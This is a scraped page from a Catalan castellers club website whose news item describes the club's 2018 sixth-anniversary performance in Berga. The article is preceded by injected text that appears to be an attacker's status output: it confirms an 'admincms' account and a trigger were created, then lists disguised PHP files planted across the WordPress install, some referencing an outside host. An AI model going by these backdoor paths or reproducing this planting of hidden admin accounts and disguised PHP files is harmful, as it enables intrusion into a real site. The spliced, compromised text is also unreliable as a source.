Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?ajax-response https://castellersdeberga.cat/wp-admin/moderation-wp-ajax-response-ajax-ajax-response-wp-private-ajax-response-wp.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-bulk-plugin-upgrader-skin-core-private-cron-private-core-meta-wp.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/user/admin-private-stream-private-private-ajax.php https://castellersdeberga.cat/wp-content/plugins/wordfence/wordfence-meta-ajax-core.php https://castellersdeberga.cat/wp-content/plugins/woo-redsys-gateway-light/about-redsys-ajax-core-stream-wp-core-meta-ajax-cron-stream-meta-private.php https://castellersdeberga.cat/wp-includes/class-wp-widget-factory-wp-core-core-meta-ajax.php https://castellersdeberga.cat/wp-includes/deprecated-cron-stream-stream.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Els Castellers de Berga brillen en la diada del 6è aniversari
 

Els Castellers de Berga brillen en la diada del 6è aniversari


Els Castellers de Berga brillen en la diada del 6è aniversariEls berguedans hem confirmat l’excel.lent estat de forma i hem completat la millor diada de la temporada 2018. A la Plaça de Sant Pere, a Berga, hem descarregat 2 pilars de 4, el 5 de 7, el tercer 2 de 7 de la temporada, el 7 de 7, 2 pilars de 5 simulanis i 3 pilars de 4 per acabar. L’anterior setmana, a Bagà, ja vam signar una magnífica actuació i aquesta tarda hem anat una passeta més enllà. Acabem un primer tram de la temporada on hem anat de menys a més i acabem de la millor manera. A partir del setembre, es treballarà per mantenir aquest nivell alt i s’intentarà tornar a descarregar el 4 de 8. Amb aquesta actuació, marxem de vacances. Tornem als assajos a mitjans d’agost i la següent actuació serà l’1 de setembre, a Artés.
Aquestes darreres setmanes, els Castellers de Berga hem fet els deures i ens hem situat a un alt nivell que, de moment, ens classifica per a la sessió de dissabte del Concurs de Castells, a la Tàrraco Arena Plaça. El sistema de puntuació es tanca el 31 d’agost i ara dependrà de les altres colles que anem a Tarragona o no.
A la diada del 6è aniversari també hi han participat els Sagals d’Osona i els nostres padrins, els Castellers de Sabadell. Els Sagals han descarregat tres castells de 7, després de la magnífica actuació que van fer la setmana anterior a la Festa Major de Vic. Els Saballuts han descarregat el 4 de 8 com a millor castell.
Descansem, carreguem piles i tornem a la feina d’aquí un mes.